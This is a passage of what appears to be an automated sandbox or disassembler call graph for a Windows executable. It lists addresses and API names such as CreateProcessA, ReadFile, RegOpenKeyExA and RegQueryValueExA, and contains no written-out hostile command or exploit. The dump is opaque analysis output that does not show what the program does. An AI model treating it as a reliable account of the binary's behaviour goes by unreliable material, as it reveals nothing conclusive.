5346->5347 5347->5325 5347->5344 5347->5346 5662 7ff65e1fc470 5347->5662 5349 7ff65e1fa640 20 API calls 5348->5349 5350 7ff65e1f64bd 5349->5350 5351 7ff65e1fd9f0 4 API calls 5350->5351 5352 7ff65e1f64d5 5351->5352 5353 7ff65e1f34a0 8 API calls 5352->5353 5354 7ff65e1f6510 5353->5354 5355 7ff65e1fa640 20 API calls 5354->5355 5356 7ff65e1f6538 5355->5356 5357 7ff65e1f8e00 55 API calls 5356->5357 5358 7ff65e1f657f 5357->5358 5359 7ff65e1fa640 20 API calls 5358->5359 5360 7ff65e1f65ab 5359->5360 5361 7ff65e1fd9f0 4 API calls 5360->5361 5362 7ff65e1f65c3 5361->5362 5363 7ff65e1f34a0 8 API calls 5362->5363 5364 7ff65e1f65fe 5363->5364 5365 7ff65e1fa640 20 API calls 5364->5365 5366 7ff65e1f662c 5365->5366 5691 7ff65e1fbc80 5366->5691 5369 7ff65e1f8e00 55 API calls 5370 7ff65e1f6678 5369->5370 5371 7ff65e1fa640 20 API calls 5370->5371 5372 7ff65e1f66a4 5371->5372 5373 7ff65e1fd9f0 4 API calls 5372->5373 5374 7ff65e1f66bc 5373->5374 5375 7ff65e1f34a0 8 API calls 5374->5375 5376 7ff65e1f66f7 5375->5376 5698 7ff65e1f8dd0 5376->5698 5378 7ff65e1f671e 5701 7ff65e1f8550 5378->5701 5382 7ff65e1f677b 5383 7ff65e1faf70 20 API calls 5382->5383 5384 7ff65e1f678f 5383->5384 5385 7ff65e1fb050 28 API calls 5384->5385 5386 7ff65e1f67a0 5385->5386 5387 7ff65e1f8550 55 API calls 5386->5387 5388 7ff65e1f67df 5387->5388 5389 7ff65e1f8550 55 API calls 5388->5389 5390 7ff65e1f681e 5389->5390 5391 7ff65e1f8550 55 API calls 5390->5391 5392 7ff65e1f685d 5391->5392 5393 7ff65e1f8e00 55 API calls 5392->5393 5394 7ff65e1f689b 5393->5394 5395 7ff65e1fa640 20 API calls 5394->5395 5428 7ff65e1f694e 5395->5428 5396 7ff65e1f6e07 5397 7ff65e1fa640 20 API calls 5396->5397 5423 7ff65e1f6ffd 5396->5423 5400 7ff65e1f6e47 5397->5400 5398 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 5399 7ff65e1f7049 5398->5399 5429 7ff65e1f8e00 5399->5429 5402 7ff65e1fd9f0 __std_exception_copy malloc free _CxxThrowException 5400->5402 5401 7ff65e1fc6e0 50 API calls 5401->5428 5403 7ff65e1f6e60 5402->5403 5404 7ff65e1f34a0 8 API calls 5403->5404 5405 7ff65e1f6e9b 5404->5405 5406 7ff65e1fa640 20 API calls 5405->5406 5407 7ff65e1f6ed0 5406->5407 5408 7ff65e1fd9f0 __std_exception_copy malloc free _CxxThrowException 5407->5408 5409 7ff65e1f6ee9 5408->5409 5410 7ff65e1f2a40 13 API calls 5409->5410 5411 7ff65e1f6f0d 5410->5411 5412 7ff65e1f8e00 55 API calls 5411->5412 5413 7ff65e1f6f53 5412->5413 5414 7ff65e1f8e00 55 API calls 5413->5414 5416 7ff65e1f6f92 5414->5416 5415 7ff65e1f2a40 13 API calls 5415->5428 5417 7ff65e1f34a0 8 API calls 5416->5417 5419 7ff65e1f6fc6 5417->5419 5418 7ff65e1f8e00 55 API calls 5418->5428 5420 7ff65e1fc6e0 50 API calls 5419->5420 5421 7ff65e1f6fd5 5420->5421 5422 7ff65e1fa640 20 API calls 5421->5422 5422->5423 5423->5398 5424 7ff65e1f34a0 8 API calls 5424->5428 5425 7ff65e1fd9f0 __std_exception_copy malloc free _CxxThrowException 5425->5428 5426 7ff65e1fa640 20 API calls 5426->5428 5427 7ff65e1f8720 71 API calls 5427->5428 5428->5396 5428->5401 5428->5415 5428->5418 5428->5424 5428->5425 5428->5426 5428->5427 5430 7ff65e1f8e5b 5429->5430 5431 7ff65e1f9056 5430->5431 5433 7ff65e1f8eff 5430->5433 5432 7ff65e1fd9f0 4 API calls 5431->5432 5434 7ff65e1f906c 5432->5434 5706 7ff65e1fbc00 5433->5706 5436 7ff65e1f9051 5434->5436 5725 7ff65e1fd610 5434->5725 5439 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 5436->5439 5438 7ff65e1f90b1 5438->5436 5443 7ff65e1fab10 8 API calls 5438->5443 5440 7ff65e1f9118 5439->5440 5440->4923 5443->5438 5445 7ff65e1f9133 5739 7ff65e1f5680 ?_Xlength_error@std@@YAXPEBD 5445->5739 5447 7ff65e1fd9f0 4 API calls 5448 7ff65e1f8f09 5447->5448 5448->5436 5448->5445 5448->5447 5449 7ff65e1fa640 20 API calls 5448->5449 5713 7ff65e1fab10 5448->5713 5717 7ff65e1fd320 5448->5717 5721 7ff65e1fd540 5448->5721 5449->5448 5450 7ff65e1f9138 5451 7ff65e1fb3b0 16 API calls 5450->5451 5452 7ff65e1f9150 5451->5452 5741 7ff65e1fbff0 5452->5741 5455 7ff65e1f91b1 5457 7ff65e1f91d6 5455->5457 5458 7ff65e1f91f1 _invalid_parameter_noinfo_noreturn 5455->5458 5456 7ff65e1f91de 5456->4923 5459 7ff65e1fda34 _Receive_impl free 5457->5459 5460 7ff65e1f7080 20 API calls 5458->5460 5459->5456 5461 7ff65e1f9212 5460->5461 5462 7ff65e1f9248 5461->5462 5463 7ff65e1f9240 5461->5463 5464 7ff65e1f9261 _invalid_parameter_noinfo_noreturn 5461->5464 5462->4923 5465 7ff65e1fda34 _Receive_impl free 5463->5465 5769 7ff65e1f92a0 __std_exception_copy __std_exception_copy 5464->5769 5465->5462 5467 7ff65e1f927e 5467->4923 5469 7ff65e1fb14e ?good@ios_base@std@ 5468->5469 5470 7ff65e1fb147 5468->5470 5471 7ff65e1fb190 5469->5471 5472 7ff65e1fb162 5469->5472 5470->5469 5473 7ff65e1fb19e ?getloc@ios_base@std@@QEBA?AVlocale@2 ??0_Lockit@std@@QEAA@H ??Bid@locale@std@ 5471->5473 5474 7ff65e1fb346 ?uncaught_exceptions@std@ 5471->5474 5472->5471 5475 7ff65e1fb178 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 5472->5475 5478 7ff65e1fb1f8 5473->5478 5476 7ff65e1fb350 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 5474->5476 5477 7ff65e1fb35a 5474->5477 5475->5471 5476->5477 5482 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 5477->5482 5479 7ff65e1fb280 ??1_Lockit@std@@QEAA 5478->5479 5480 7ff65e1fb21b 5478->5480 5481 7ff65e1fb20f ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12 5478->5481 5483 7ff65e1fb2b6 ?put@?$time_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@QEBA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@AEAVios_base@2@DPEBUtm@@PEBD3 5479->5483 5493 7ff65e1fb299 5479->5493 5480->5479 5487 7ff65e1fb235 ?_Getcat@?$time_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@ 5480->5487 5481->5480 5484 7ff65e1f74cf 5482->5484 5485 7ff65e1fb33f 5483->5485 5486 7ff65e1fb326 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N 5483->5486 5484->4935 5484->4937 5485->5474 5486->5485 5488 7ff65e1fb250 5487->5488 5489 7ff65e1fb39d 5487->5489 5844 7ff65e1fd7e8 malloc 5488->5844 5846 7ff65e1f5620 5489->5846 5492 7ff65e1fb3a2 5493->5483 5494 7ff65e1fb268 5494->5479 5496 7ff65e1fc71a 5495->5496 5497 7ff65e1fc722 5495->5497 5498 7ff65e1fbc00 12 API calls 5496->5498 5499 7ff65e1fd320 memcmp 5497->5499 5500 7ff65e1fc88d 5497->5500 5498->5497 5501 7ff65e1fc743 5499->5501 5850 7ff65e1fcea0 5500->5850 5504 7ff65e1fd540 memcmp 5501->5504 5508 7ff65e1fc76f 5501->5508 5504->5508 5505 7ff65e1fc888 5506 7ff65e1f5680 ?_Xlength_error@std@@YAXPEBD 5505->5506 5506->5500 5507 7ff65e1fb470 39 API calls 5511 7ff65e1fc8bd _CxxThrowException 5507->5511 5508->5505 5509 7ff65e1fd9f0 4 API calls 5508->5509 5514 7ff65e1fc7e1 5508->5514 5510 7ff65e1fc7a2 5509->5510 5512 7ff65e1f9f80 40 API calls 5510->5512 5512->5514 5513 7ff65e1fc846 5516 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 5513->5516 5514->5513 5515 7ff65e1fc83e 5514->5515 5517 7ff65e1fc881 _invalid_parameter_noinfo_noreturn 5514->5517 5518 7ff65e1fda34 _Receive_impl free 5515->5518 5519 7ff65e1f7625 5516->5519 5517->5505 5518->5513 5519->4945 5519->4946 5521 7ff65e1fd9f0 4 API calls 5520->5521 5522 7ff65e1f8b5e localeconv 5521->5522 5523 7ff65e1f8bf2 memset 5522->5523 5525 7ff65e1fd9f0 4 API calls 5523->5525 5526 7ff65e1f8c4a memset 5525->5526 5527 7ff65e1f8c9a 5526->5527 5528 7ff65e1f8d4f 5527->5528 5529 7ff65e1f8d4a 5527->5529 5531 7ff65e1f8d43 _invalid_parameter_noinfo_noreturn 5527->5531 5530 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 5528->5530 5532 7ff65e1fda34 _Receive_impl free 5529->5532 5533 7ff65e1f8dab 5530->5533 5531->5529 5532->5528 5533->4970 5535 7ff65e1f6410 5534->5535 5536 7ff65e1f6238 CreateProcessA 5534->5536 5537 7ff65e1f11e0 9 API calls 5535->5537 5538 7ff65e1f63dc CloseHandle CloseHandle 5536->5538 5539 7ff65e1f62bc CloseHandle ReadFile 5536->5539 5540 7ff65e1f6421 _CxxThrowException 5537->5540 5542 7ff65e1f11e0 9 API calls 5538->5542 5541 7ff65e1f6384 WaitForSingleObject CloseHandle CloseHandle CloseHandle 5539->5541 5547 7ff65e1f6305 5539->5547 5543 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 5541->5543 5544 7ff65e1f63fe _CxxThrowException 5542->5544 5545 7ff65e1f63c4 5543->5545 5544->5535 5545->5006 5546 7ff65e1f6335 memmove 5549 7ff65e1f6362 ReadFile 5546->5549 5547->5541 5547->5546 5548 7ff65e1f38c0 12 API calls 5547->5548 5548->5549 5549->5541 5549->5547 5551 7ff65e1f3af6 ?good@ios_base@std@ 5550->5551 5553 7ff65e1f3b2f 5551->5553 5562 7ff65e1f3b5d 5551->5562 5554 7ff65e1f3b45 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 5553->5554 5553->5562 5554->5562 5556 7ff65e1f3bb7 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 5558 7ff65e1f3ba7 5556->5558 5559 7ff65e1f3b67 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exceptions@std@ 5556->5559 5557 7ff65e1f3b8b ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 5557->5558 5557->5562 5558->5559 5563 7ff65e1f3bd9 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 5558->5563 5560 7ff65e1f3c41 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 5559->5560 5561 7ff65e1f3c4b ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5559->5561 5560->5561 5561->5014 5561->5015 5562->5556 5562->5557 5562->5559 5563->5558 5563->5559 5565 7ff65e1fcce8 5564->5565 5567 7ff65e1fcbde 5564->5567 5566 7ff65e1f1120 Concurrency::cancel_current_task __std_exception_copy 5565->5566 5568 7ff65e1fcced 5566->5568 5567->5565 5569 7ff65e1fd9f0 __std_exception_copy malloc free _CxxThrowException 5567->5569 5570 7ff65e1f9f80 40 API calls 5567->5570 5571 7ff65e1fcce1 _invalid_parameter_noinfo_noreturn 5567->5571 5569->5567 5570->5567 5571->5565 5573 7ff65e1f9f98 5572->5573 5574 7ff65e1fa047 5572->5574 5573->4952 5574->5573 5858 7ff65e1f2a00 5574->5858 5580 7ff65e1fb400 5579->5580 5580->5580 5581 7ff65e1fb41c 5580->5581 5582 7ff65e1fb6a0 9 API calls 5580->5582 5583 7ff65e1f3200 13 API calls 5581->5583 5582->5581 5584 7ff65e1fb435 5583->5584 5585 7ff65e1f3200 13 API calls 5584->5585 5586 7ff65e1f7dd0 5585->5586 5587 7ff65e1fb470 5586->5587 5588 7ff65e1f34a0 8 API calls 5587->5588 5589 7ff65e1fb4c0 5588->5589 5590 7ff65e1f34a0 8 API calls 5589->5590 5591 7ff65e1fb4e6 5590->5591 5592 7ff65e1f56c0 31 API calls 5591->5592 5593 7ff65e1fb4f7 5592->5593 5594 7ff65e1fcac0 16 API calls 5593->5594 5595 7ff65e1fb50b 5594->5595 5596 7ff65e1fb545 5595->5596 5599 7ff65e1fb53e _invalid_parameter_noinfo_noreturn 5595->5599 5602 7ff65e1fb54a 5595->5602 5600 7ff65e1fda34 _Receive_impl free 5596->5600 5597 7ff65e1fb599 5598 7ff65e1fb5d8 __std_exception_copy 5597->5598 5603 7ff65e1fb5d3 5597->5603 5608 7ff65e1fb5cc _invalid_parameter_noinfo_noreturn 5597->5608 5604 7ff65e1fb671 5598->5604 5605 7ff65e1fb63d 5598->5605 5599->5596 5600->5602 5601 7ff65e1fb594 5607 7ff65e1fda34 _Receive_impl free 5601->5607 5602->5597 5602->5601 5606 7ff65e1fb58d _invalid_parameter_noinfo_noreturn 5602->5606 5609 7ff65e1fda34 _Receive_impl free 5603->5609 5611 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 5604->5611 5610 7ff65e1fb66c 5605->5610 5612 7ff65e1fb665 _invalid_parameter_noinfo_noreturn 5605->5612 5606->5601 5607->5597 5608->5603 5609->5598 5613 7ff65e1fda34 _Receive_impl free 5610->5613 5614 7ff65e1f7de6 _CxxThrowException 5611->5614 5612->5610 5613->5604 5614->4963 5617 7ff65e1fc8ef 5616->5617 5618 7ff65e1fc94d 5616->5618 5620 7ff65e1fc8f4 5617->5620 5621 7ff65e1fc952 5617->5621 5622 7ff65e1fc92c 5617->5622 5624 7ff65e1fc90a 5617->5624 5635 7ff65e1faec0 ?_Xlength_error@std@@YAXPEBD 5618->5635 5620->5296 5625 7ff65e1f1120 Concurrency::cancel_current_task __std_exception_copy 5621->5625 5623 7ff65e1fd9f0 4 API calls 5622->5623 5623->5620 5626 7ff65e1fd9f0 4 API calls 5624->5626 5627 7ff65e1fc958 5625->5627 5628 7ff65e1fc90f 5626->5628 5629 7ff65e1fc982 5627->5629 5631 7ff65e1fda34 _Receive_impl free 5627->5631 5628->5620 5630 7ff65e1fc925 _invalid_parameter_noinfo_noreturn 5628->5630 5629->5296 5630->5622 5631->5629 5633 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 5632->5633 5634 7ff65e1f123e _CxxThrowException 5633->5634 5634->5288 5637 7ff65e1fc3d3 5636->5637 5638 7ff65e1fc3de 5636->5638 5637->5638 5641 7ff65e1fc419 5637->5641 5643 7ff65e1fd9f0 4 API calls 5637->5643 5639 7ff65e1f1120 Concurrency::cancel_current_task __std_exception_copy 5638->5639 5640 7ff65e1fc46e 5639->5640 5642 7ff65e1fd9f0 4 API calls 5641->5642 5642->5638 5644 7ff65e1fc3fc 5643->5644 5644->5638 5645 7ff65e1fc412 _invalid_parameter_noinfo_noreturn 5644->5645 5645->5641 5647 7ff65e1fce94 5646->5647 5652 7ff65e1fcd2b 5646->5652 5687 7ff65e1faec0 ?_Xlength_error@std@@YAXPEBD 5647->5687 5649 7ff65e1fce99 5650 7ff65e1f1120 Concurrency::cancel_current_task __std_exception_copy 5649->5650 5651 7ff65e1fce9f 5650->5651 5652->5649 5653 7ff65e1fcdc1 5652->5653 5655 7ff65e1fcd9f 5652->5655 5657 7ff65e1fcd84 5652->5657 5654 7ff65e1fd9f0 4 API calls 5653->5654 5654->5657 5656 7ff65e1fd9f0 4 API calls 5655->5656 5658 7ff65e1fcda7 5656->5658 5657->5657 5679 7ff65e1fc620 5657->5679 5658->5657 5660 7ff65e1fcdba _invalid_parameter_noinfo_noreturn 5658->5660 5660->5653 5664 7ff65e1fc48c 5662->5664 5669 7ff65e1fc518 5662->5669 5663 7ff65e1fc470 19 API calls 5663->5664 5664->5663 5665 7ff65e1f7080 19 API calls 5664->5665 5666 7ff65e1fda34 free _Receive_impl 5664->5666 5667 7ff65e1fc52a _invalid_parameter_noinfo_noreturn 5664->5667 5664->5669 5665->5664 5666->5664 5668 7ff65e1fc549 5667->5668 5668->5347 5669->5347 5674 7ff65e1faef5 5670->5674 5677 7ff65e1faf4d 5670->5677 5671 7ff65e1faf14 5672 7ff65e1faf45 5671->5672 5675 7ff65e1faf65 _invalid_parameter_noinfo_noreturn 5671->5675 5676 7ff65e1fda34 _Receive_impl free 5672->5676 5673 7ff65e1f7080 19 API calls 5673->5674 5674->5671 5674->5673 5676->5677 5677->5334 5680 7ff65e1fc69f 5679->5680 5684 7ff65e1fc647 5679->5684 5680->5313 5682 7ff65e1fc666 5683 7ff65e1fc697 5682->5683 5685 7ff65e1fc6cc _invalid_parameter_noinfo_noreturn 5682->5685 5686 7ff65e1fda34 _Receive_impl free 5683->5686 5684->5682 5688 7ff65e1f7080 5684->5688 5686->5680 5689 7ff65e1fa640 20 API calls 5688->5689 5690 7ff65e1f7090 5689->5690 5690->5684 5692 7ff65e1fd9f0 4 API calls 5691->5692 5693 7ff65e1fbca7 5692->5693 5694 7ff65e1f34a0 8 API calls 5693->5694 5695 7ff65e1fbcdb 5694->5695 5696 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 5695->5696 5697 7ff65e1f6635 5696->5697 5697->5369 5699 7ff65e1f8e00 55 API calls 5698->5699 5700 7ff65e1f8dee 5699->5700 5700->5378 5702 7ff65e1f8e00 55 API calls 5701->5702 5703 7ff65e1f6767 5702->5703 5704 7ff65e1faf70 5703->5704 5705 7ff65e1fa640 20 API calls 5704->5705 5707 7ff65e1fd9f0 4 API calls 5706->5707 5708 7ff65e1fbc27 5707->5708 5709 7ff65e1fd9f0 4 API calls 5708->5709 5710 7ff65e1fbc4c 5709->5710 5711 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 5710->5711 5712 7ff65e1fbc70 5711->5712 5712->5448 5714 7ff65e1fab58 5713->5714 5715 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 5714->5715 5716 7ff65e1fadc8 5715->5716 5716->5448 5718 7ff65e1fd356 5717->5718 5720 7ff65e1fd3ce 5717->5720 5719 7ff65e1fd386 memcmp 5718->5719 5718->5720 5719->5718 5720->5448 5722 7ff65e1fd55b memcmp 5721->5722 5724 7ff65e1fd585 5722->5724 5724->5448 5726 7ff65e1fd691 5725->5726 5727 7ff65e1fd62f 5725->5727 5770 7ff65e1faec0 ?_Xlength_error@std@@YAXPEBD 5726->5770 5729 7ff65e1fd638 5727->5729 5730 7ff65e1fd696 5727->5730 5731 7ff65e1fd670 5727->5731 5733 7ff65e1fd64e 5727->5733 5729->5438 5735 7ff65e1f1120 Concurrency::cancel_current_task __std_exception_copy 5730->5735 5732 7ff65e1fd9f0 4 API calls 5731->5732 5732->5729 5734 7ff65e1fd9f0 4 API calls 5733->5734 5736 7ff65e1fd653 5734->5736 5737 7ff65e1fd69c 5735->5737 5736->5729 5738 7ff65e1fd669 _invalid_parameter_noinfo_noreturn 5736->5738 5738->5731 5740 7ff65e1f56ae 5739->5740 5740->5450 5742 7ff65e1f34a0 8 API calls 5741->5742 5743 7ff65e1fc041 5742->5743 5744 7ff65e1f34a0 8 API calls 5743->5744 5745 7ff65e1fc067 5744->5745 5771 7ff65e1f56c0 5745->5771 5750 7ff65e1fc0ce 5752 7ff65e1fc11d 5750->5752 5756 7ff65e1fc118 5750->5756 5760 7ff65e1fc111 _invalid_parameter_noinfo_noreturn 5750->5760 5751 7ff65e1fc0c9 5755 7ff65e1fda34 _Receive_impl free 5751->5755 5753 7ff65e1fc15c __std_exception_copy 5752->5753 5757 7ff65e1fc157 5752->5757 5762 7ff65e1fc150 _invalid_parameter_noinfo_noreturn 5752->5762 5758 7ff65e1fc1c5 5753->5758 5759 7ff65e1fc1f9 5753->5759 5754 7ff65e1fc0c2 _invalid_parameter_noinfo_noreturn 5754->5751 5755->5750 5761 7ff65e1fda34 _Receive_impl free 5756->5761 5763 7ff65e1fda34 _Receive_impl free 5757->5763 5764 7ff65e1fc1f4 5758->5764 5766 7ff65e1fc1ed _invalid_parameter_noinfo_noreturn 5758->5766 5765 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 5759->5765 5760->5756 5761->5752 5762->5757 5763->5753 5767 7ff65e1fda34 _Receive_impl free 5764->5767 5768 7ff65e1f915d _CxxThrowException 5765->5768 5766->5764 5767->5759 5768->5455 5768->5456 5769->5467 5772 7ff65e1f56f6 5771->5772 5772->5772 5803 7ff65e1fc990 5772->5803 5774 7ff65e1f577c 5775 7ff65e1f57b8 5774->5775 5822 7ff65e1fb6a0 5774->5822 5777 7ff65e1f3200 13 API calls 5775->5777 5778 7ff65e1f57d1 5777->5778 5779 7ff65e1f3200 13 API calls 5778->5779 5780 7ff65e1f57ea 5779->5780 5781 7ff65e1f57f7 5780->5781 5782 7ff65e1f35a0 9 API calls 5780->5782 5783 7ff65e1f3200 13 API calls 5781->5783 5782->5781 5784 7ff65e1f583a 5783->5784 5785 7ff65e1f3200 13 API calls 5784->5785 5786 7ff65e1f584f 5785->5786 5787 7ff65e1f5890 5786->5787 5788 7ff65e1f588b 5786->5788 5790 7ff65e1f5884 _invalid_parameter_noinfo_noreturn 5786->5790 5789 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 5787->5789 5791 7ff65e1fda34 _Receive_impl free 5788->5791 5792 7ff65e1f58a0 5789->5792 5790->5788 5791->5787 5793 7ff65e1fcac0 5792->5793 5794 7ff65e1fcb1d 5793->5794 5795 7ff65e1fcb18 5793->5795 5797 7ff65e1f3200 13 API calls 5794->5797 5796 7ff65e1fb6a0 9 API calls 5795->5796 5796->5794 5798 7ff65e1fcb3a 5797->5798 5799 7ff65e1f3200 13 API calls 5798->5799 5800 7ff65e1fcb53 5799->5800 5801 7ff65e1f3200 13 API calls 5800->5801 5802 7ff65e1fc08f 5801->5802 5802->5750 5802->5751 5802->5754 5804 7ff65e1fc9d2 5803->5804 5805 7ff65e1fc9b9 5803->5805 5806 7ff65e1fcaaf 5804->5806 5807 7ff65e1fc9e8 5804->5807 5805->5774 5842 7ff65e1f11c0 ?_Xlength_error@std@@YAXPEBD 5806->5842 5808 7ff65e1fc9ee memmove 5807->5808 5816 7ff65e1fca14 5807->5816 5808->5774 5810 7ff65e1fca20 5813 7ff65e1fd9f0 4 API calls 5810->5813 5811 7ff65e1fcab4 5814 7ff65e1f1120 Concurrency::cancel_current_task __std_exception_copy 5811->5814 5812 7ff65e1fca84 memmove 5812->5774 5817 7ff65e1fca36 5813->5817 5818 7ff65e1fcaba 5814->5818 5815 7ff65e1fca7c 5819 7ff65e1fd9f0 4 API calls 5815->5819 5816->5810 5816->5811 5816->5812 5816->5815 5820 7ff65e1fca75 _invalid_parameter_noinfo_noreturn 5817->5820 5821 7ff65e1fca3b 5817->5821 5819->5821 5820->5815 5821->5812 5823 7ff65e1fb7dd 5822->5823 5825 7ff65e1fb6c9 5822->5825 5843 7ff65e1f11c0 ?_Xlength_error@std@@YAXPEBD 5823->5843 5826 7ff65e1fb72e 5825->5826 5829 7ff65e1fb721 5825->5829 5830 7ff65e1fb759 5825->5830 5831 7ff65e1fb714 5825->5831 5828 7ff65e1fd9f0 4 API calls 5826->5828 5827 7ff65e1fb7e2 5832 7ff65e1f1120 Concurrency::cancel_current_task __std_exception_copy 5827->5832 5828->5831 5829->5826 5829->5827 5834 7ff65e1fd9f0 4 API calls 5830->5834 5833 7ff65e1fb7b0 _invalid_parameter_noinfo_noreturn 5831->5833 5836 7ff65e1fb7b7 memmove 5831->5836 5837 7ff65e1fb776 memmove 5831->5837 5835 7ff65e1fb7e8 5832->5835 5833->5836 5834->5831 5838 7ff65e1fb7ae 5836->5838 5839 7ff65e1fb78e 5837->5839 5840 7ff65e1fb7a3 5837->5840 5838->5775 5839->5833 5839->5840 5841 7ff65e1fda34 _Receive_impl free 5840->5841 5841->5838 5845 7ff65e1fd804 5844->5845 5845->5494 5849 7ff65e1f55f0 5846->5849 5848 7ff65e1f562e _CxxThrowException __std_exception_copy 5848->5492 5849->5848 5851 7ff65e1fcef0 5850->5851 5852 7ff65e1fcf0c 5851->5852 5853 7ff65e1fb6a0 9 API calls 5851->5853 5854 7ff65e1f3200 13 API calls 5852->5854 5853->5852 5855 7ff65e1fcf25 5854->5855 5856 7ff65e1f3200 13 API calls 5855->5856 5857 7ff65e1fc8aa 5856->5857 5857->5507 5859 7ff65e1f2a20 5858->5859 5859->5859 5860 7ff65e1f34a0 8 API calls 5859->5860 5861 7ff65e1f2a2e 5860->5861 5862 7ff65e1fbd00 5861->5862 5863 7ff65e1f34a0 8 API calls 5862->5863 5864 7ff65e1fbd51 5863->5864 5865 7ff65e1f34a0 8 API calls 5864->5865 5866 7ff65e1fbd77 5865->5866 5867 7ff65e1f56c0 31 API calls 5866->5867 5868 7ff65e1fbd8b 5867->5868 5869 7ff65e1fcac0 16 API calls 5868->5869 5870 7ff65e1fbd9f 5869->5870 5871 7ff65e1fbdd9 5870->5871 5872 7ff65e1fbdde 5870->5872 5876 7ff65e1fbdd2 _invalid_parameter_noinfo_noreturn 5870->5876 5877 7ff65e1fda34 _Receive_impl free 5871->5877 5873 7ff65e1fbe28 5872->5873 5875 7ff65e1fbe2d 5872->5875 5878 7ff65e1fbe21 _invalid_parameter_noinfo_noreturn 5872->5878 5879 7ff65e1fda34 _Receive_impl free 5873->5879 5874 7ff65e1fbe6c __std_exception_copy 5881 7ff65e1fbed5 5874->5881 5882 7ff65e1fbf09 5874->5882 5875->5874 5880 7ff65e1fbe67 5875->5880 5884 7ff65e1fbe60 _invalid_parameter_noinfo_noreturn 5875->5884 5876->5871 5877->5872 5878->5873 5879->5875 5885 7ff65e1fda34 _Receive_impl free 5880->5885 5886 7ff65e1fbf04 5881->5886 5889 7ff65e1fbefd _invalid_parameter_noinfo_noreturn 5881->5889 5883 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 5882->5883 5888 7ff65e1fa075 _CxxThrowException 5883->5888 5884->5880 5885->5874 5887 7ff65e1fda34 _Receive_impl free 5886->5887 5887->5882 5889->5886 5890->5099 5892 7ff65e1f83f3 5891->5892 5893 7ff65e1f8420 5891->5893 5896 7ff65e1f8483 _invalid_parameter_noinfo_noreturn 5892->5896 5897 7ff65e1fda34 _Receive_impl free 5892->5897 5894 7ff65e1f846a 5893->5894 5895 7ff65e1f8462 5893->5895 5893->5896 5894->5105 5898 7ff65e1fda34 _Receive_impl free 5895->5898 5899 7ff65e1f84d6 5896->5899 5904 7ff65e1f849f 5896->5904 5897->5893 5898->5894 5900 7ff65e1f8519 5899->5900 5901 7ff65e1f8543 _invalid_parameter_noinfo_noreturn 5899->5901 5907 7ff65e1f8521 5899->5907 5902 7ff65e1fda34 _Receive_impl free 5900->5902 5901->5907 5902->5907 5903 7ff65e1f9f33 5903->5105 5904->5899 5904->5901 5905 7ff65e1fda34 _Receive_impl free 5904->5905 5905->5899 5906 7ff65e1f9ed8 5909 7ff65e1f9f28 5906->5909 5910 7ff65e1f9f4b _invalid_parameter_noinfo_noreturn 5906->5910 5907->5903 5907->5906 5908 7ff65e1f83e0 20 API calls 5907->5908 5908->5907 5911 7ff65e1fda34 _Receive_impl free 5909->5911 5912 7ff65e1fa640 20 API calls 5910->5912 5911->5903 5913 7ff65e1f9f70 5912->5913 5913->5105 6056 7ff65e1fdd98 6059 7ff65e1fe20c 6056->6059 6060 7ff65e1fdda1 6059->6060 6061 7ff65e1fe22f GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6059->6061 6061->6060 4477 7ff65e1f4130 RegOpenKeyExA 4478 7ff65e1f41de 4477->4478 4479 7ff65e1f417a RegQueryValueExA 4477->4479 4484 7ff65e1f4530 9 API calls 4478->4484 4486 7ff65e1f3eb0 4478->4486 4480 7ff65e1f41d3 RegCloseKey 4479->4480 4481 7ff65e1f41a9 4479->4481 4480->4478 4481->4480 4482 7ff65e1f41b0 strstr 4481->4482 4482->4478 4482->4481 4485 7ff65e1f427e ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 4484->4485 4485->4486 4487 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 4486->4487 4488 7ff65e1f423d 4487->4488 6278 7ff65e1f58b0 __std_exception_destroy __std_exception_destroy 6279 7ff65e1f58eb 6278->6279 6280 7ff65e1f58f8 6278->6280 6281 7ff65e1fda34 _Receive_impl free 6279->6281 6281->6280 6386 7ff65e1fd930 6387 7ff65e1fd952 6386->6387 6388 7ff65e1fd96f 6387->6388 6389 7ff65e1fd968 LocalFree 6387->6389 6390 7ff65e1fd982 6388->6390 6391 7ff65e1fda34 _Receive_impl free 6388->6391 6389->6388 6391->6390 4490 7ff65e1f40ac RegOpenKeyExA 4491 7ff65e1f40e3 RegQueryValueExA 4490->4491 4492 7ff65e1f41de 4490->4492 4493 7ff65e1f411c RegCloseKey 4491->4493 4494 7ff65e1f41d8 RegCloseKey 4491->4494 4495 7ff65e1f4530 9 API 